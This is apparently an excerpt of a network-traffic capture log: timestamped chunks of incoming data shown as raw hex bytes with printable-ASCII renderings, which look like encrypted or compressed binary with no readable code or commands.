                                                                                      2023-08-04 16:48:39 UTC410INData Raw: a2 64 91 c0 f7 05 a2 b1 f1 59 6c 26 19 5c 4d 85 1f a5 bb 74 1b 76 cb f3 ae 10 64 1f 86 1c da 34 96 87 b7 20 2b f3 43 26 8b d7 71 5b 7a 3f 18 5d 85 ce d4 d4 5c 95 0c c0 21 f7 a3 9c 80 3b 0e 4e 76 80 56 a6 53 b1 c2 cb 27 04 06 e7 88 e0 49 01 78 ac 8e 7d 80 5a 8b 4e 6c 77 8c 26 f5 c2 68 64 96 b7 6e e4 07 f8 b0 69 f4 d0 67 0f 77 ee f7 d5 a8 fc f5 66 02 85 fe 40 81 85 7e e2 0d 59 32 f5 e4 af bb 2f 97 38 29 a3 28 3c c7 51 22 dd 87 76 93 76 ba d9 23 b0 2b c7 f6 ff 6a f9 69 ec ee 9b d3 2a cf 71 ba d1 19 7c 6c 85 15 a6 13 82 71 ad 89 dd 33 ea e4 c3 b6 e2 3d be 10 ca ec 87 c6 df b9 b6 a3 f0 9e 4d 0f 3d 61 12 70 18 09 35 50 22 fe 3a 58 ae 71 28 a8 f2 0e 08 34 10 da 8b 6b 60 aa 86 91 6a f5 62 16 09 e2 6c 93 8b 9d c0 75 b5 68 4d 35 6a 13 27 5f ba ea 49 90 d1 10 62 0a
                                                                                      Data Ascii: dYl&\Mtvd4 +C&q[z?]\!;NvVS'Ix}ZNlw&hdnigwf@~Y2/8)(<Q"vv#+ji*q|lq3=M=ap5P":Xq(4k`jbluhM5j'_Ib
                                                                                      2023-08-04 16:48:39 UTC414INData Raw: 57 40 e1 1b 99 a0 95 83 5a 99 3e 1d cd d9 c6 2a b2 86 ed 05 d5 74 ac 1e 1a 69 ec fe c4 4c 06 05 99 3e 1c 23 a1 08 03 31 a7 98 48 1d bc 05 ce f1 b3 e3 de 29 85 bd 0c 3f e8 57 4c 0d 7a 0b 29 88 36 9b af 7a 35 a6 5a 91 c5 93 e8 ea 1c df 58 d6 8e 7d 55 fc 5a 3b fa 32 cb 58 3d 9c 64 79 35 0e 8f 7f d9 13 9f 1e 61 08 db 6a 0b 99 d3 6f 49 02 45 33 ef c9 1e 38 7b 97 33 8e fb 0b 37 34 7a ff a8 5a 56 e4 b3 e8 61 00 06 a7 4e e4 70 20 ca 54 63 40 09 7d ca f8 52 ec 44 6d 2e 9f a4 46 39 6b 0b 3b 8f aa 8f 1c 54 31 29 7f dd 38 1a 23 b4 8a 9b c3 74 45 f6 1e f0 2e 6d 45 ac 35 99 05 c6 67 86 76 d4 90 59 90 9d 40 ca d2 6a fb 28 23 e1 ad 3e 01 ba 27 ab 00 5e f2 f0 fd bf df fb cd 2e ff 29 9a 56 9e bd cd 57 55 33 b5 98 08 71 55 04 58 45 7d 41 44 db ce 22 f7 27 23 80 1a 0a ac 8b
                                                                                      Data Ascii: W@Z>*tiL>#1H)?WLz)6z5ZX}UZ;2X=dy5ajoIE38{374zZVaNp Tc@}RDm.F9k;T1)8#tE.mE5gvY@j(#>'^.)VWU3qUXE}AD"'#
                                                                                      2023-08-04 16:48:39 UTC418INData Raw: b7 aa e2 98 7f df 13 ad fb b7 8b b3 4d 3b 6f c0 5c 1e c8 d8 c9 45 84 5c d5 98 3f 83 31 dd c6 6c 26 44 f2 eb a4 0f eb 92 86 56 02 57 50 40 c9 cb 7a 44 75 81 1f 11 b1 cd b8 a9 36 45 c2 3b e5 8a a2 ae 6f 4a f7 f0 a4 f2 37 fe d3 06 09 6b ce 71 21 0f a8 f3 d7 21 ab 86 48 c5 33 b3 e7 fa ad df 02 e6 a6 57 d3 f4 de 08 e4 7a 5f 83 52 5d 72 ce 85 7b 77 db d6 31 d7 b1 54 24 e8 5a b2 58 c0 2a 16 90 2b ab c8 24 fd f3 d3 f7 47 ba 4a f6 ba 25 16 50 b5 16 b8 cb b9 b0 16 52 5c c4 c7 da e7 b1 1a eb 9f ff 50 57 3d ec 67 81 aa cf 69 e0 de c5 80 a0 2e a9 7c a0 8d e4 c5 25 89 9f db 6b 1c 67 a7 93 22 c1 4e 15 28 57 34 4f 97 fd e6 5a 62 1b 13 00 95 39 b6 73 2a 0e 6b cb d1 a2 36 ab ee 23 b5 61 a6 e3 10 9c 98 60 3f 6f 15 2f 04 60 79 97 e3 f5 b1 27 cc cf 3e ec 42 50 36 8d 99 06 0a
                                                                                      Data Ascii: M;o\E\?1l&DVWP@zDu6E;oJ7kq!!H3Wz_R]r{w1T$ZX*+$GJ%PR\PW=gi.|%kg"N(W4OZb9s*k6#a`?o/`y'>BP6
                                                                                      2023-08-04 16:48:39 UTC422INData Raw: c0 55 74 bb ae 87 55 e6 2c 52 ed 4e dd 3b d0 6b c5 5c 4e f6 4f 1b da 2d 55 ef 69 cd f5 a1 a5 b9 6b 96 8c 7d 1c 7c e1 7d 5a 7b ee c9 e6 80 5e 56 27 ec 55 7a 46 73 6d b6 74 9a de 23 57 a6 0a ea a3 c8 e2 71 72 78 9f 44 4f 6c 3a e9 d0 26 ba 35 50 95 c6 99 95 34 d1 0a 99 d1 97 fc 55 06 06 1c 80 d1 56 53 38 5e 88 48 f6 2b a2 5b 95 f4 10 33 ab ad aa 34 68 bd e6 69 9d 48 62 d4 4d 0b 05 ef 6e b2 7b 60 46 71 6d 64 64 d5 d2 d1 46 af 95 46 38 2f 5a 55 6e 54 17 4f 60 6d bf 6c 1e 50 84 3b 0d 58 15 39 9f 3d bf d8 07 2b 13 4e aa 6c f8 f4 fd 96 87 d3 bd 49 b7 3c 76 7f 47 c9 83 0a cd 19 ca 62 5f c9 08 ae 2d c2 71 8e 51 d4 1e 8a ce 60 74 ed 14 f1 18 6a a0 2e 47 e3 96 15 db 27 8d 1e 37 9f 2b 0e f3 11 f4 63 2e 60 f2 1d 0e 53 c8 42 74 b0 28 7e bf 3a 3b de 3e 7c e0 1d db 01 2f
                                                                                      Data Ascii: UtU,RN;k\NO-Uik}|}Z{^V'UzFsmt#WqrxDOl:&5P4UVS8^H+[34hiHbMn{`FqmddFF8/ZUnTO`mlP;X9=+NlI<vGb_-qQ`tj.G'7+c.`SBt(~:;>|/
                                                                                      2023-08-04 16:48:39 UTC426INData Raw: be 20 1b 81 41 f5 61 55 60 a9 b2 bc 9e 15 da 6e 3e 7b b4 b3 6f 4e ee 2b 4a 45 ba 5e dd 2e 59 63 d6 99 c5 14 98 59 32 fd 5d 51 ac a7 fe ba f1 4c e3 ea b9 9d dc 6a 8c af 43 c4 ad 2f 99 f4 58 30 e4 b7 02 88 24 34 e2 93 31 b6 4a 10 23 93 d3 7f 3f 91 e3 f3 79 65 70 e5 07 64 77 30 e1 33 a4 f2 92 f1 00 55 1b 79 d8 d5 9b 0d 23 86 b6 7b f7 f0 df db 8a 40 2c 08 6b bb 50 c6 69 59 e0 18 8b 47 c9 4d e5 5f 7e 77 61 15 fa e3 a2 03 cd 88 e8 da 48 c0 7f f8 d6 7d 6d fb 47 fd e6 8d 50 5c b1 cf 29 9c f8 db 46 08 3e 86 b4 b6 cc d1 05 f3 3c 63 c5 db bb 71 98 e5 83 ac 8a a9 92 eb 7e 89 3f 17 f6 23 04 31 1f b1 d0 11 d5 d6 1c a1 20 48 33 0b 2a 8c 67 d0 74 b0 dd 4f 59 ae 63 dc 56 fd b5 71 5c d2 a0 f9 a3 f9 1d bc 80 fb c5 93 7c fe 3a 5d cb a3 60 ba 92 e0 ba ff 63 9f 17 63 db 3c f5
                                                                                      Data Ascii: AaU`n>{oN+JE^.YcY2]QLjC/X0$41J#?yepdw03Uy#{@,kPiYGM_~waH}mGP\)F><cq~?#1 H3*gtOYcVq\|:]`cc<
                                                                                      2023-08-04 16:48:39 UTC430INData Raw: 41 2f 96 70 07 f0 c8 26 91 fb 39 96 70 01 07 88 cf ec 68 45 5d 66 65 a3 66 9e f5 1e c7 79 eb 93 40 c8 ee 64 bc b2 c1 f3 9a ea 3a 67 2c 11 d2 4a df 97 11 51 82 b1 e4 97 8e 87 ce 92 7a 15 f6 00 d9 46 65 87 3a 9d f2 fc c8 3d 1a 38 e2 a4 9c 56 f8 3c 67 96 3f fd 54 23 d1 4d 7e 69 6d d6 25 57 a7 6f 96 68 97 59 bc 27 d8 3f a7 d9 2e 50 b1 7e 0d 20 0b 75 3d 36 2e 88 ba 09 84 67 1e 1d 77 03 e1 75 50 ec 17 b8 46 0a ad 5a d3 d5 2a a0 cb 76 4d 8a 80 04 04 4f 70 4f 94 1a 39 16 95 b9 89 b0 a9 03 ff 2b bc ee 6f dc 30 63 40 d8 fb 50 42 55 05 a7 41 e9 2d de ef 2f ef e9 2d 9c 03 dc 24 a0 2f b3 0e 33 4b 6f 59 04 a4 00 0b 42 ba 68 23 42 5c f4 02 47 09 1e 79 89 60 a8 ba b0 8c 4f 0e ce 89 f3 fa d3 47 aa 1f 63 7d 47 43 7c c9 63 f2 c7 c6 0d 7f 47 27 94 09 0d 0c 21 29 3d 6d f4 28
                                                                                      Data Ascii: A/p&9phE]fefy@d:g,JQzFe:=8V<g?T#M~im%WohY'?.P~ u=6.gwuPFZ*vMOpO9+o0c@PBUA-/-$/3KoYBh#B\Gy`OGc}GC|cG'!)=m(
                                                                                      2023-08-04 16:48:39 UTC434INData Raw: 01 f8 7a 20 4f 28 69 34 b6 3a 74 52 61 e1 09 30 bb 90 13 35 6e a5 65 8c ef 5f 30 c0 2c 1a 53 af a7 e8 fe a8 c9 47 4f 39 66 73 3d 0a 54 44 ab ae eb 4a c5 02 e5 b1 46 99 b4 dc 64 ed 78 50 a6 ef fc f7 65 f7 00 94 82 47 18 f8 80 68 bb 37 b5 f7 f3 20 be 65 68 4b af f1 af 42 52 85 26 75 db 50 9a c4 0e 42 f5 ee 3d 64 f4 8e 09 03 13 bf 10 17 49 35 22 50 b1 15 f4 4f a9 ea 5b e4 94 4c 59 cd 67 3d e3 e7 90 e4 cb c7 db 90 c1 ff 27 08 18 f8 e6 53 8e 5f 41 50 a7 25 18 7b a3 ca b1 7f a1 49 20 2c c5 1e 73 ba 84 32 1d a8 bc 24 de a7 7f 8f a5 0c 7b 56 dc 9b e9 52 f9 83 b4 72 03 a8 61 29 d7 3e 28 2d 8d bf e3 5e 23 94 80 ba bf a4 01 d7 2c 96 06 e2 ed 22 a8 d7 d6 b6 82 e2 e1 01 aa 1f 67 71 e9 1d e5 85 cf f2 96 1e d4 ab de f6 a5 8a 8b a8 0a bd de 5f 20 69 24 00 88 cc 2a a8 5c
                                                                                      Data Ascii: z O(i4:tRa05ne_0,SGO9fs=TDJFdxPeGh7 ehKBR&uPB=dI5"PO[LYg='S_AP%{I ,s2${VRra)>(-^#,"gq_ i$*\
                                                                                      2023-08-04 16:48:39 UTC438INData Raw: c7 bb 1b d2 89 10 cb e4 2f 33 69 09 a4 af f6 aa 98 b6 9c 32 4c eb f7 af 8d 4d 27 9a ca 32 0c d4 2f 2a 1d 01 c8 83 06 43 db 71 bb 4d c8 99 68 0a 6c 9a 68 f5 ae 18 44 c7 71 20 b8 3f a1 4f 2c f5 73 d5 b4 4c cc 65 70 79 1c 2b cf 75 5e 79 12 db bf c2 05 ca ce 70 6c d5 45 73 81 a2 81 1d af 5c 20 f0 a8 e1 af a2 7c 72 34 c1 04 10 9a 43 b8 c3 9b 9d e9 c4 4c 26 de 3c 26 aa 0d 78 01 22 3e 9d 6e bd 30 a5 26 c3 4d f7 c0 6a 5b 8a d2 e2 75 fb b3 bd 57 71 ac 68 94 83 d4 40 34 0f 4e c1 be 45 6b 7c bf e5 95 a1 c4 55 9e db b2 ce c0 69 12 38 ec 63 5a ac 74 cb bb 15 96 42 59 30 67 67 b6 70 2b 2a 17 73 8c 22 bb 3f a2 da 1b 2a b7 59 1a 4d de 88 24 c7 de 29 ae 5e 93 1a 25 d7 a5 a3 fe 15 b3 14 44 48 7d 7f 67 19 4f ce d2 25 d6 18 b3 d8 21 8d 5f 48 2c 98 95 d9 7b e6 1a 6d 97 71 f0
                                                                                      Data Ascii: /3i2LM'2/*CqMhlhDq ?O,sLepy+u^yplEs\ |r4CL&<&x">n0&Mj[uWqh@4NEk|Ui8cZtBY0ggp+*s"?*YM$)^%DH}gO%!_H,{mq
                                                                                      2023-08-04 16:48:39 UTC442INData Raw: 59 68 6f 49 ea 5d 61 61 ee 35 b1 83 4c 9f b7 4c 58 a4 0f f9 62 76 77 ac 5e d4 1c a2 0e 5a a4 f6 67 ce fa f8 4c d7 0f 7d 75 13 0a a1 95 f4 1d 31 a8 1c 9c 1e 9b 64 9d b4 05 57 b2 be 36 d6 85 f2 46 e6 21 72 87 bd dd 54 45 fc aa 7b ab 80 6a ef 3e 94 90 3d 2e fb bb 81 e0 5d 1a 9c 29 1c 9d 46 ae 60 64 99 51 b4 fc 79 95 c0 dc 8f 3b dd a7 8c 1b 52 9c 00 3a e8 f8 57 b9 0b ab 4a 06 2d cc ff 20 66 88 77 28 9f 52 e4 cc f4 c0 ee fb fa 4d 7c 1e 07 2d 26 68 e9 79 7a e3 da e7 bc 11 17 fd 8d e4 2c 16 9f 28 98 d2 e6 7b e4 e0 9d 89 0c 5a 4b 45 2f d5 33 b3 84 9b 78 6c f6 37 78 32 e1 20 d0 e4 70 17 ec 6e 40 7e 6d c4 cd 5a 15 a0 f9 ff 54 52 7a 1c a0 8e 6d 48 b4 bf 76 cf ad c3 bc 07 00 8f 7e 2d 3a cf d4 8d f0 3b 7d bb 03 bb 0a ab 8a bd 94 11 1a 65 da c3 78 78 ac ed 77 be 3c 47
                                                                                      Data Ascii: YhoI]aa5LLXbvw^ZgL}u1dW6F!rTE{j>=.])F`dQy;R:WJ- fw(RM|-&hyz,({ZKE/3xl7x2 pn@~mZTRzmHv~-:;}exxw<G
                                                                                      2023-08-04 16:48:39 UTC446INData Raw: 70 36 1d 2b c8 a2 19 bb df 63 b9 88 da e4 c4 7d 08 47 ac 89 03 7b b3 b0 2d e1 81 32 36 b0 cf d8 e8 d4 a3 19 01 2d 7f 14 fd 50 2a e0 ef 51 46 55 12 e9 00 dd 27 68 b7 d3 05 20 f6 1a 4d c2 c5 ed 44 44 01 48 ff fb 99 4a b4 51 5f 05 e7 f2 1b b4 c6 b6 79 80 2d df 94 89 7b a1 de 08 46 b7 f5 82 31 26 37 7e b3 37 cf 38 31 13 e9 42 f6 bf 38 d6 79 51 24 53 6d 8c b9 6b 10 ac 20 50 dd 48 cd ad b1 cb c9 ed c9 36 31 01 a1 bf bf 95 86 2a 2d fc f3 0f b4 fe f1 6f b6 35 30 64 90 a9 dd 35 b7 a4 ba d5 5e 98 81 80 eb bb 3f 5c 74 66 61 f6 b0 31 00 49 21 2e ef 65 ff 15 3d d4 9e 61 2f 30 f4 08 de 3b 38 7b 82 6c 81 e9 fa 95 a9 0e 06 4a 1a 0c 99 2b 81 ff d6 2e 51 85 90 59 b5 67 68 27 f9 43 b9 bf 95 6f 4b a5 75 58 c3 0c d0 cb 4f d8 c7 e5 2c 7d 0b 7b e9 98 d7 08 fc 8c 0c ff 49 00 05
                                                                                      Data Ascii: p6+c}G{-26-P*QFU'h MDDHJQ_y-{F1&7~781B8yQ$Smk PH61*-o50d5^?\tfa1I!.e=a/0;8{lJ+.QYgh'CoKuXO,}{I
                                                                                      2023-08-04 16:48:39 UTC450INData Raw: 2e 14 19 96 c7 0e 9a e0 25 f7 27 34 cf a2 1d 3b 12 86 33 00 19 dc dc 58 c9 88 82 62 b5 14 ed be 27 eb e2 76 a9 a7 a0 ad 46 aa 39 e8 34 f2 87 3f b9 4e e7 6f 3a 89 22 52 b4 a5 cd 83 1f 71 21 01 2f 3a f8 2b 50 e3 9f 64 9b 43 16 32 de f9 57 70 d0 a8 34 39 f9 08 b4 fe 53 93 9b 1a 86 0f f1 9a f5 89 d9 78 72 f3 0a 5d 91 b9 90 0f 2d fa 33 70 95 6e 01 7f a5 dd 7a 90 a8 b7 a6 a8 28 86 7c 77 ff 42 dc 64 77 9e d5 fa ce 44 6c 5b 4a 59 04 7f c0 44 d0 fc d1 18 bf 5a fb 9c a1 20 1b 7b b8 be f3 51 9f b0 09 5f 11 57 f6 74 09 81 03 4d d1 1c 03 77 0b 60 33 85 7c fd e6 30 b0 05 07 b7 a0 14 a7 b1 16 60 dd f6 d1 e2 39 49 32 c5 4e 4d a9 21 ba dc 7b 0d 38 07 21 66 8e 6e b6 82 9d b9 e7 83 29 b2 f2 0a 4f 09 25 8e 8c ce 2a 70 4c a2 18 aa 58 49 c7 30 96 68 c2 e9 c8 ee 56 6b af 21 7a
                                                                                      Data Ascii: .%'4;3Xb'vF94?No:"Rq!/:+PdC2Wp49Sxr]-3pnz(|wBdwDl[JYDZ {Q_WtMw`3|0`9I2NM!{8!fn)O%*pLXI0hVk!z
                                                                                      2023-08-04 16:48:39 UTC454INData Raw: 35 cc 87 2e 19 24 57 4a 29 20 02 3e 03 4a 76 4e f1 c7 3b 2f 84 f5 55 42 f8 60 10 2b c8 78 93 ad 8b 7f f5 bd 80 8d a9 60 15 f4 79 db d2 34 6f bd eb 99 05 17 b2 cf 3d 6f 07 34 e7 43 70 1f 44 1e f5 ec 93 06 58 dd 1e 98 69 33 d5 e8 cb 48 0c ec 9a 3d 40 c3 ae 88 6e e2 3e a8 ac 3d 5c d5 df f3 e7 ad 9e 6e ed 63 35 0a 0f a5 1e 1c d8 b7 d9 05 f9 24 4b ab 21 f3 c3 3a f6 db e2 87 c3 46 9f e6 4f 04 42 b3 50 0d e8 02 e9 f8 32 01 2c fa 4e dc 7e 56 ce f9 b7 1a 0a f9 f1 8f 58 ca ca 48 23 e0 27 6f c4 17 e0 a9 73 4b 68 f5 86 f2 dc db 1c af 3b 73 93 66 f7 b7 ee 52 63 81 05 1b 01 09 90 62 94 2d f7 e1 bd 09 15 fa 9c 0c 55 32 a8 b8 a5 03 4c b3 fc 0b 30 86 3c cf c1 77 29 af a7 23 4e c4 70 71 1d 72 71 3c b2 55 3f 23 3c 3a 02 2c 4c 9f 2e 9e 1b f4 c5 2c f7 00 fe eb dc c8 e8 53 36
                                                                                      Data Ascii: 5.$WJ) >JvN;/UB`+x`y4o=o4CpDXi3H=@n>=\nc5$K!:FOBP2,N~VXH#'osKh;sfRcb-U2L0<w)#Npqrq<U?#<:,L.,S6
                                                                                      2023-08-04 16:48:39 UTC458INData Raw: b3 1e 5d fd 0c 50 5b 46 2a 56 99 89 42 e0 21 51 27 5d f3 30 ed 06 5e 65 f2 98 d3 dd 27 4a 8e 25 1b c6 75 7a af b4 c9 7d a6 e2 6e d7 8b 1c ca fc 26 8d 0a 0e e0 b0 53 92 ee c8 05 2c 1e c9 6c ad 35 95 b5 4e a1 c4 bb d1 ef 4c b3 e4 35 0a cd 9d 15 5b e5 af c5 ee 96 f5 2a 0f 9c 1a cf 77 19 e7 3b bb d5 42 73 8a ad 7a 08 a4 b8 92 77 25 71 60 a5 81 d2 0c 5b 78 ac 16 47 ba 91 9d bf 4e 57 ed 24 aa 71 02 87 f9 87 45 e7 dd ed ff 69 f4 00 65 7e f8 a2 49 fa ed 5c bc 15 f3 ce ba 67 4e 2b 71 d3 e7 c8 49 4f 87 db 51 67 ec 73 3e bf a1 6c 04 c2 14 a8 6e 7e b9 14 22 00 6d 1f fc ab c5 57 ea 18 92 b3 60 7d 03 8e 70 d9 ac 62 d0 76 bf 61 b1 5a 35 2b a7 85 1e 25 f0 65 28 40 8e fa 06 b6 cc 21 85 c1 37 87 a1 b6 b9 52 2e f8 ae f0 63 b0 36 db 78 1c 5b ed b1 e5 a5 d9 44 b4 6c 24 b7 65
                                                                                      Data Ascii: ]P[F*VB!Q']0^e'J%uz}n&S,l5NL5[*w;Bszw%q`[xGNW$qEie~I\gN+qIOQgs>ln~"mW`}pbvaZ5+%e(@!7R.c6x[Dl$e
                                                                                      2023-08-04 16:48:39 UTC462INData Raw: 78 ef 00 72 c8 25 95 5d 61 33 8e 9c b3 59 52 75 6c 29 78 34 35 51 f2 1f 01 c2 49 42 ae 8d d7 73 35 51 c1 7c 18 fc 01 91 a8 5f 18 af b5 f8 b3 f3 5e cc 36 eb c9 3c 6c 0a 56 5e 4d 02 e4 c0 5f 90 ac 97 63 a7 16 8a 7e 9f ca 24 2c 52 94 8e 40 30 5f a8 8c c4 70 d9 ec 39 2c 41 63 d0 e4 b3 49 19 62 6d fd a2 91 ba c9 2d 80 0b 86 50 1d 34 71 03 68 fd 77 aa 0c b3 4b 8a e9 be 75 f6 f3 fc 6f 9b 76 23 46 79 dd 50 81 ee 8f 59 33 bb 72 ff fa 63 12 48 98 a4 70 6c da a8 25 72 de 81 b2 6e c0 f9 7f 30 bb 44 9b 05 1f 54 62 aa 96 1e 1b 2c cb 65 88 89 39 d0 af cb 6e 2f 2f 90 14 5b 7b 0d e8 4f 82 73 9a 05 74 02 c8 54 28 ed 40 fa a1 b9 f4 80 9b f5 d5 d4 06 41 a3 85 f5 d4 50 f1 20 28 6b 73 06 b8 11 35 e5 71 33 a7 6d b1 96 5b 25 13 5d 65 2d 08 10 f7 8e 9f 00 1d 90 e4 7c 85 26 55 63
                                                                                      Data Ascii: xr%]a3YRul)x45QIBs5Q|_^6<lV^M_c~$,R@0_p9,AcIbm-P4qhwKuov#FyPY3rcHpl%rn0DTb,e9n//[{OstT(@AP (ks5q3m[%]e-|&Uc
                                                                                      2023-08-04 16:48:39 UTC466INData Raw: 04 ec 8d 15 32 37 8f 08 17 a0 55 44 24 bb 24 7c fe b1 5c 9e 63 16 35 9b 8f 81 18 64 ed f1 80 56 3a 98 f2 24 d9 36 9a bb ac 44 07 fb c9 a6 e0 29 7d b8 cf 4d 01 4e 17 de 28 fa 28 38 bf af d4 7e 45 c1 6a 58 55 84 16 8c 61 0c cc 77 0b f6 e8 1a 93 81 2d ee c6 1d 8d 04 b6 fc 77 ee 94 4e d5 e3 06 eb 11 28 0b 0f e9 99 0f d4 4a 18 7c 84 69 87 db 9a f7 d3 4b 3c 2d 67 7d 8b 14 f8 d2 c3 66 9d 3a 71 07 e1 5f af 67 71 8c d2 b6 24 d6 65 65 28 6f 9f 94 d5 49 28 73 54 ed 1e cc 9b 62 68 2a b9 53 be b9 58 13 21 7f 8e 21 70 af db 8c 9f 90 ba 10 64 04 b4 88 04 34 7c 63 db 21 c5 02 b9 79 91 a2 b5 eb d7 5b e5 52 f1 6c 2b 0d 9b 9e 9d 6a 0b ed 0a 22 2c e0 9c cb 45 2d a9 58 b9 df 45 14 cf 6a 58 07 c1 b7 38 76 cf b2 a6 b8 e8 64 74 8e ca 48 99 81 54 f4 2b 42 0e 88 c5 17 f6 d5 a3 77
                                                                                      Data Ascii: 27UD$$|\c5dV:$6D)}MN((8~EjXUaw-wN(J|iK<-g}f:q_gq$ee(oI(sTbh*SX!!pd4|c!y[Rl+j",E-XEjX8vdtHT+Bw
                                                                                      2023-08-04 16:48:39 UTC470INData Raw: f5 95 2f c4 3d 9c c0 22 27 d8 41 1c f3 a6 09 52 82 70 63 01 2a 69 f1 74 99 38 7c 54 72 c4 88 3e d8 d4 e5 16 8c c9 53 4e 67 97 8c 47 3d 91 21 31 9d 26 60 75 ca b9 84 f7 bc e2 af d8 1a 3c 7a 38 2f 4e 0f 7b 76 e0 64 2a cb a8 97 60 d8 5a a9 7b 3a 41 09 5d 17 1b b3 e4 17 83 cb a7 24 0a 86 44 00 34 1d 41 4b 4a ca 07 5e 8b 52 9b 22 46 6b 2e 94 45 5d 8b e4 29 fa 57 25 6a d9 3e 4b 3b 05 64 f5 8a 6d 33 17 49 96 8b d1 ab e6 e5 8c b3 3e bd da c8 b1 e8 b4 bf 35 d8 97 02 09 1e 9d 4e f9 03 76 38 55 35 4c eb 9d b4 fa 06 9d c3 49 d3 57 c4 2c 60 48 f2 b2 b5 33 f4 84 fd 1e f7 d2 4f ef 2e 47 78 da d0 79 69 3d 72 95 51 5e 4f ca cb 00 e2 8d 44 86 a8 ba 4a 4c 41 99 03 2e f7 07 06 82 f0 27 96 a4 e5 a0 34 17 9b 52 f1 bd 02 ad 08 4d 43 b8 ed 53 dd 36 8d dd 67 81 8f ed 00 2d 02 42
                                                                                      Data Ascii: /="'ARpc*it8|Tr>SNgG=!1&`u<z8/N{vd*`Z{:A]$D4AKJ^R"Fk.E])W%j>K;dm3I>5Nv8U5LIW,`H3O.Gxyi=rQ^ODJLA.'4RMCS6g-B
                                                                                      2023-08-04 16:48:39 UTC474INData Raw: 9d 87 13 03 f1 5e 5a 7e ee a7 a1 34 f2 b5 77 39 49 93 2c 0f 34 c4 c6 1e b1 bd ac 54 32 4a 18 6f 3b 6d 61 25 0c 03 d3 d0 e6 cf bb 3c 88 b5 87 03 0f 56 db cc 24 54 96 f3 ee 75 ff f1 f0 6e 71 06 91 99 af 6a 1d a9 da 92 7d 91 18 16 88 2d 9d 92 45 a7 4b f5 3c 70 b7 8c b4 ff 2b 38 56 45 33 ad 19 ce 78 7a 3d 50 2d 08 80 3d 77 ae 2b a6 07 72 04 29 a4 0f 16 ee d4 dd 5e 7b e2 61 0c 6c dd 72 bb 60 e4 ba f8 98 95 b6 33 87 09 28 7c 3f 20 0e 2a af f2 4a 15 7c 22 54 1b 21 c8 cb f9 b8 b5 99 30 f7 d4 59 3d d0 42 ac b6 12 68 75 1e 87 6d 0b 30 10 6e 98 84 fd f5 d6 ef eb 2b 4f 16 68 ee 93 d1 59 fd 89 19 0c 92 3e d0 df 1d 61 66 87 c2 a6 2d 23 bb 91 15 3e c9 36 52 1a d7 1b f6 7e 63 e9 f7 78 f3 df aa ef 2b ee cd 20 ed 84 a5 40 b7 6d ac db 39 85 e1 75 c4 05 31 ae 27 b2 ad a3 49
                                                                                      Data Ascii: ^Z~4w9I,4T2Jo;ma%<V$Tunqj}-EK<p+8VE3xz=P-=w+r)^{alr`3(|? *J|"T!0Y=Bhum0n+OhY>af-#>6R~cx+ @m9u1'I
                                                                                      2023-08-04 16:48:39 UTC478INData Raw: 7d da e5 f7 de 5b ea 41 34 97 a0 6d 08 ac 61 15 a9 d6 f1 9a 26 6a c5 5e 82 ea b5 3e cc f1 d7 89 a9 15 d5 ad 90 c7 b4 07 c6 50 c5 dc 1d fc b5 76 53 65 47 1a 18 58 20 1c cc ef 92 00 82 8e 13 28 3a 86 32 3b a1 97 81 32 03 f1 e1 02 cd ad ce 81 aa 64 1b 92 43 86 2f ce c4 0a 77 ad 45 99 41 f2 ff 59 47 50 91 ed 03 df d2 f9 a0 16 dd 82 61 29 2c 2e 2a d2 11 1a 66 fc db c2 f3 f7 e0 e6 c3 5b be 45 45 05 e6 6a 93 33 90 1e ea 26 ab d9 7c 34 e1 9f df cf 1b 96 84 ea dd f0 f7 0c 22 07 1e d5 61 a2 7c e5 bb ea 2e 76 2d bd 20 ce 1b 9a 3c c3 24 50 2b 4d 7a cb 9a 9b 64 94 7e 58 86 1b 0d bf b4 76 e3 8c 4f fc 73 f0 9f dc 46 f5 94 86 fd 67 54 81 13 46 fc 7d 55 5a d1 d1 a7 c7 44 e0 04 c4 a6 5e ae 95 c7 97 33 46 14 e2 de 9b 80 60 39 fd 0b 2f 0a 1d bd 40 d5 c4 00 59 d6 09 d2 2c 1f
                                                                                      Data Ascii: }[A4ma&j^>PvSeGX (:2;2dC/wEAYGPa),.*f[EEj3&|4"a|.v- <$P+Mzd~XvOsFgTF}UZD^3F`9/@Y,
                                                                                      2023-08-04 16:48:39 UTC482INData Raw: 10 40 be fb 6b 8d 2c 31 61 ff 7c f7 c1 5c e8 e2 2a cc df bc a4 02 7f 6f 52 f7 05 6a bc b3 1d 98 e6 ce cc 83 fb 0b 79 db 13 d0 06 49 41 64 ab 5f 9a fd c7 37 5e 5f 8b 99 4a f6 c8 a1 2d aa 83 fc 36 c1 59 dd 76 b0 df 62 01 d2 ab b1 d1 43 11 7e b0 7d 13 d5 5c 63 82 89 b5 9e 03 24 25 d3 a3 41 4a 80 3e b2 30 9f 94 0e 2f f4 bc b4 3b 15 1a f3 30 4e 26 f6 82 66 aa 1e 17 1d af 48 ae 6f f9 a7 00 e4 bc 83 d2 d4 93 e2 eb 6a 2b 4b fb a5 c3 c7 ef 74 7c 0c 82 54 0e 75 83 a0 c8 4d 6a 1f 05 24 6d f3 8d 89 49 2e a2 7e d8 cd 23 97 e0 e3 07 3b a3 27 59 74 82 74 87 28 52 69 df 1d 02 32 a3 fe e9 e2 56 fb 1c 02 4f 18 fd ad 0c 83 ab 97 f5 39 f9 06 fa 0f 6f 95 5a 7e b3 59 7e 4d a9 14 f2 6c d1 df d2 4a ec e3 ce 33 77 bd 71 3f dc a9 0c 74 5c 35 14 10 f3 75 05 de f4 30 eb d9 a1 c6 4d
                                                                                      Data Ascii: @k,1a|\*oRjyIAd_7^_J-6YvbC~}\c$%AJ>0/;0N&fHoj+Kt|TuMj$mI.~#;'Ytt(Ri2VO9oZ~Y~MlJ3wq?t\5u0M
                                                                                      2023-08-04 16:48:39 UTC486INData Raw: c2 27 30 bb 9f 70 80 dc f6 f8 ac 6f 4c cc f5 ef 6e 19 7e 21 2c 5b 9b bc bb c1 6d f4 50 c8 ef b4 55 9d 10 5b e3 d6 a6 1f 00 d2 c6 27 ec b4 dd 96 3d e1 d0 d2 50 bd 9a 4d f9 fb e3 b4 3d 12 8f 0b ea c1 41 18 fc 9b 73 3a cd 18 cd 55 a5 38 c9 7e 9a 7c 6b ec 53 a1 fd 66 21 eb 02 c7 b1 06 fb 35 4c 3a b3 b7 d3 ab 16 1a 8e f3 10 b0 ce b6 d5 04 7d 18 0a b5 78 b4 d8 de 03 09 c6 80 e2 1c 03 4d cb 97 5f 59 0c 50 e3 16 73 e8 e8 af 18 64 60 b3 5c 2e f7 d2 db e1 50 05 ff 60 73 75 84 8a b8 39 3c 0c 75 e0 a6 4e 08 97 26 e0 8f b9 c1 a0 0d 00 87 00 7f 04 9f d3 d1 9b 